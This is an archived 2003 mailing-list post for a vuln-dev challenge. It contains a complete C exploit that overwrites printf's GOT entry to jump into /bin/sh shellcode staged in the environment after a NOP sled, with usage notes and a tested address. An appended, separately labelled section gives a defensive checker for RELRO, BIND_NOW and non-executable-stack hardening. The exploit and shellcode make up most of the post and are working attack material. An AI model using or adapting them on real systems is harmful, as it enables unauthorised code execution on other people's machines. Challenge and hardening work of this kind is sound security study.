
[Vuln-dev Challenge] example exploit for 2

From: <ot(at)hushmail.com>
Date: Sat May 24 2003 - 12:18:47 EDT

example exploit for vuln-dev challenge 2, requires the address of the shellcode in the environment as an argument

/*
 * example exploit code for vuln-dev challenge 2
 *
 * we overwrite printf's got table entry to point to our
 * shellcode in the environment
 *
 * omicron tau - ot@hushmail.com
 */
/*
 * objdump, grep, and awk need to be in your path
 *
 * tested on linux 2.4.20 using env address 0xbfffe2ac
 *
 * rm db.log first
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define VULNPATH        "./vdc2"                /* path to vulnerable binary */

/* /bin/sh */
char shellcode[]=

    "\xeb\x21\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x89\x76\x0b\x8d"
    "\x5e\x08\x89\x5e\x0f\x89\x46\x13\xb0\x0b\x89\xf3\x8d\x4e\x0b"
    "\x8d\x56\x13\xcd\x80\xe8\xda\xff\xff\xff\x2f\x62\x69\x6e\x2f"
    "\x73\x68\x38\x2d\x69\x32\x33\x34\x35\x36\x37\x38\x39\x61\x62"
    "\x63\x64\x65";

unsigned int go;        /* GOT entry address for printf */

void
find_got_addr()
{

        FILE *p;
        char buf[1024];

        snprintf(buf, sizeof(buf), "objdump -R %s | grep ' printf' | " \
            "awk '{ print \"0x\"$1 }'", VULNPATH);
        p = popen(buf, "r");
        fgets(buf, sizeof(buf), p);
        pclose(p);

        go = strtoul(buf, NULL, 0);
        go -= 2;        /* ;; */

        printf("[!] using got addr 0x%x\n", go);
}

int
main(int argc, char *argv[])
{

	char envbuf[8192];
	char obuf[129];
	char scbuf[5];
	unsigned int scaddr;
	int i;

	if (argc < 2) {
		fputs("vdc2x: usage: vdc2x scaddr\n", stderr);
		exit(1);
	}
	scaddr = strtoul(argv[1], NULL, 0);

	find_got_addr();

	memset(obuf, 0, sizeof(obuf));
	for (i = 0; i < sizeof(obuf) - 1; i+=4)
		memcpy(&obuf[i], &go, 4);
	obuf[sizeof(obuf) - 1] = 0;

	memset(envbuf, 0x90, sizeof(envbuf));
	memcpy(&envbuf[8000], shellcode, strlen(shellcode));
	envbuf[sizeof(envbuf) - 1] = 0;
	setenv("SC", envbuf, 1);

	memcpy(scbuf, &scaddr, 4);
	scbuf[4] = 0;
	execl(VULNPATH, "./vdc2", obuf, scbuf, NULL);

	return(0);

}

Received on Sat May 24 17:17:23 2003
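The technique in this post needs a writable GOT entry for printf and executable memory holding the environment. As an added example (not part of the original post or the challenge), the C function below reports whether an ELF32 binary carries the markers that remove those conditions: PT_GNU_RELRO plus BIND_NOW (full RELRO) and a non-executable PT_GNU_STACK. It assumes glibc's <elf.h> and a little-endian host; got_hardening and the H_* names are introduced here.

```c
#include <elf.h>
#include <stdio.h>
#include <string.h>
enum { H_RELRO = 1, H_BINDNOW = 2, H_NXSTACK = 4 };
/* Added example: H_* bits for an ELF32 LSB image (LSB host assumed), -1 if malformed. */
int got_hardening(const unsigned char *img, size_t len)
{
	Elf32_Ehdr eh;
	int flags = 0;
	if (len < sizeof(eh) || memcmp(img, ELFMAG, SELFMAG) != 0 ||
	    img[EI_CLASS] != ELFCLASS32 || img[EI_DATA] != ELFDATA2LSB)
		return -1;
	memcpy(&eh, img, sizeof(eh));
	if (eh.e_phentsize != sizeof(Elf32_Phdr) || eh.e_phoff > len ||
	    (size_t)eh.e_phnum * sizeof(Elf32_Phdr) > len - eh.e_phoff)
		return -1;
	for (unsigned i = 0; i < eh.e_phnum; i++) {
		Elf32_Phdr ph;
		memcpy(&ph, img + eh.e_phoff + i * sizeof(ph), sizeof(ph));
		if (ph.p_type == PT_GNU_RELRO)  /* relocated data, GOT included, goes read-only */
			flags |= H_RELRO;
		if (ph.p_type == PT_GNU_STACK && !(ph.p_flags & PF_X))
			flags |= H_NXSTACK;     /* stack, and the environment on it, not executable */
		if (ph.p_type != PT_DYNAMIC)
			continue;
		if (ph.p_offset > len || ph.p_filesz > len - ph.p_offset)
			return -1;
		for (size_t o = 0; o + sizeof(Elf32_Dyn) <= ph.p_filesz; o += sizeof(Elf32_Dyn)) {
			Elf32_Dyn d;
			memcpy(&d, img + ph.p_offset + o, sizeof(d));
			if (d.d_tag == DT_NULL)
				break;
			if (d.d_tag == DT_BIND_NOW ||   /* eager binding: .got.plt is covered too */
			    (d.d_tag == DT_FLAGS && (d.d_un.d_val & DF_BIND_NOW)) ||
			    (d.d_tag == DT_FLAGS_1 && (d.d_un.d_val & DF_1_NOW)))
				flags |= H_BINDNOW;
		}
	}
	return flags;
}

int main(int argc, char **argv)
{
	static unsigned char buf[1 << 22];  /* headers must fall within the first 4 MiB */
	FILE *f = argc > 1 ? fopen(argv[1], "rb") : NULL;
	int h = f ? got_hardening(buf, fread(buf, 1, sizeof(buf), f)) : -1;
	printf("flags=%d (1 RELRO, 2 BIND_NOW, 4 NX stack; -1 unreadable or not ELF32)\n", h);
	return h < 0;
}
```

A result of 1 without 2 is partial RELRO, which leaves the lazily bound .got.plt entries writable; only 1 and 2 together make the printf entry read-only.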


This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:07:39 EDT

